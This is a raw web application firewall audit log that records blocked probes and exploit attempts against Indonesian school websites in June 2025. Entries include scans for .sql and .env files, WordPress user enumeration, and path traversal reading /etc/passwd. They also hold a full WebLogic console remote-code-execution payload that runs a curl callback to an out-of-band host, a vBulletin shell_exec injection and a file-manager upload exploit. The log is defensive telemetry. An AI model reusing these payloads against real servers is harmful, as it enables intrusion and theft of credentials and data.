--0ce99f20-Z-- --5b71cc4c-A-- [03/Jun/2025:20:24:55 +0700] aD73p5AN5Lj366RdGMz9dQAAANQ 103.236.140.4 38734 103.236.140.4 8181 --5b71cc4c-B-- GET /wordpress_8.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --5b71cc4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b71cc4c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957095786973 2631 (- - -) Stopwatch2: 1748957095786973 2631; combined=946, p1=451, p2=467, p3=0, p4=0, p5=28, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b71cc4c-Z-- --32c66d3a-A-- [03/Jun/2025:20:24:56 +0700] aD73qESujXvW2xVCZlUPPgAAABA 103.236.140.4 38744 103.236.140.4 8181 --32c66d3a-B-- GET /blogdb.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --32c66d3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32c66d3a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957096434775 2483 (- - -) Stopwatch2: 1748957096434775 2483; combined=893, p1=434, p2=431, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32c66d3a-Z-- --897bd366-A-- [03/Jun/2025:20:24:57 +0700] aD73qUSujXvW2xVCZlUPQAAAAAM 103.236.140.4 38754 103.236.140.4 8181 --897bd366-B-- GET /wordpress2.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --897bd366-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --897bd366-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957097129310 2533 (- - -) Stopwatch2: 1748957097129310 2533; combined=952, p1=425, p2=498, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --897bd366-Z-- --48383502-A-- [03/Jun/2025:20:24:57 +0700] aD73qUSujXvW2xVCZlUPQwAAAA0 103.236.140.4 38764 103.236.140.4 8181 --48383502-B-- GET /nova.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --48383502-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48383502-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957097695966 2502 (- - -) Stopwatch2: 1748957097695966 2502; combined=889, p1=460, p2=404, p3=0, p4=0, p5=25, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48383502-Z-- --6cc6e52b-A-- [03/Jun/2025:20:24:58 +0700] aD73qpAN5Lj366RdGMz9dgAAAMU 103.236.140.4 38774 103.236.140.4 8181 --6cc6e52b-B-- GET /dbwordpress.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --6cc6e52b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cc6e52b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957098257964 2094 (- - -) Stopwatch2: 1748957098257964 2094; combined=977, p1=432, p2=515, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cc6e52b-Z-- --a7cc4d05-A-- [03/Jun/2025:20:24:58 +0700] aD73qpAN5Lj366RdGMz9dwAAAME 103.236.140.4 38780 103.236.140.4 8181 --a7cc4d05-B-- GET /wp_prod.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --a7cc4d05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7cc4d05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957098831582 2491 (- - -) Stopwatch2: 1748957098831582 2491; combined=905, p1=422, p2=453, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7cc4d05-Z-- --c019a313-A-- [03/Jun/2025:20:40:31 +0700] aD77T40G58RZMmoh8H0qxAAAAIw 103.236.140.4 50544 103.236.140.4 8181 --c019a313-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 156.239.195.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.239.195.78 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c019a313-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c019a313-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748958031776880 3125 (- - -) Stopwatch2: 1748958031776880 3125; combined=1460, p1=468, p2=959, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c019a313-Z-- --6d5e8b61-A-- [03/Jun/2025:20:43:12 +0700] aD778AhM7ynDNybXsoPmsgAAAEg 103.236.140.4 52568 103.236.140.4 8181 --6d5e8b61-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173026218 --6d5e8b61-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6d5e8b61-E-- --6d5e8b61-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748958192049819 2542 (- - -) Stopwatch2: 1748958192049819 2542; combined=682, p1=527, p2=126, p3=0, p4=0, p5=29, sr=122, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d5e8b61-Z-- --28f12114-A-- [03/Jun/2025:20:43:13 +0700] aD778ZAN5Lj366RdGMwAegAAAM0 103.236.140.4 52590 103.236.140.4 8181 --28f12114-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173026227 --28f12114-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --28f12114-E-- --28f12114-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748958193697790 1823 (- - -) Stopwatch2: 1748958193697790 1823; combined=620, p1=463, p2=124, p3=0, p4=0, p5=33, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28f12114-Z-- --f3fd2523-A-- [03/Jun/2025:20:44:50 +0700] aD78UghM7ynDNybXsoPnNwAAAEk 103.236.140.4 53808 103.236.140.4 8181 --f3fd2523-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36 Accept-Charset: utf-8 --f3fd2523-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3fd2523-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748958290079852 783 (- - -) Stopwatch2: 1748958290079852 783; combined=314, p1=281, p2=0, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3fd2523-Z-- --16b44d56-A-- [03/Jun/2025:20:57:45 +0700] aD7_WZAN5Lj366RdGMwDBAAAANM 103.236.140.4 35321 103.236.140.4 8181 --16b44d56-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173053643 --16b44d56-C-- cH --16b44d56-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --16b44d56-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748959065936810 4352 (- - -) Stopwatch2: 1748959065936810 4352; combined=2747, p1=573, p2=2082, p3=29, p4=33, p5=30, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16b44d56-Z-- --d97fa32b-A-- [03/Jun/2025:20:57:45 +0700] aD7_WY0G58RZMmoh8H0tCQAAAIY 103.236.140.4 35326 103.236.140.4 8181 --d97fa32b-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0us2vpgpeonc6qdbef04o3gkkt7mthf4.oast.me X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172450196 --d97fa32b-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --d97fa32b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d97fa32b-E-- --d97fa32b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748959065936956 15015 (- - -) Stopwatch2: 1748959065936956 15015; combined=771, p1=364, p2=377, p3=0, p4=0, p5=29, sr=48, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d97fa32b-Z-- --0842bd4c-A-- [03/Jun/2025:20:57:45 +0700] aD7_WZAN5Lj366RdGMwDCAAAAM0 103.236.140.4 35358 103.236.140.4 8181 --0842bd4c-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172780490 --0842bd4c-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --0842bd4c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0842bd4c-E-- --0842bd4c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748959065957386 1452 (- - -) Stopwatch2: 1748959065957386 1452; combined=463, p1=298, p2=140, p3=0, p4=0, p5=25, sr=58, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0842bd4c-Z-- --d857da7e-A-- [03/Jun/2025:20:57:45 +0700] aD7_WZAN5Lj366RdGMwDBwAAAMk 103.236.140.4 35344 103.236.140.4 8181 --d857da7e-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165424317 --d857da7e-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --d857da7e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d857da7e-E-- --d857da7e-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748959065955150 4201 (- - -) Stopwatch2: 1748959065955150 4201; combined=2543, p1=448, p2=2066, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d857da7e-Z-- --6531dc42-A-- [03/Jun/2025:21:03:51 +0700] aD8AxwhM7ynDNybXsoPsZQAAAEg 103.236.140.4 39998 103.236.140.4 8181 --6531dc42-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 46.101.123.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 46.101.123.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6531dc42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6531dc42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748959431973128 733 (- - -) Stopwatch2: 1748959431973128 733; combined=321, p1=285, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6531dc42-Z-- --cc63e02f-A-- [03/Jun/2025:21:07:03 +0700] aD8BhwhM7ynDNybXsoPtoAAAAFI 103.236.140.4 42414 103.236.140.4 8181 --cc63e02f-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --cc63e02f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc63e02f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file 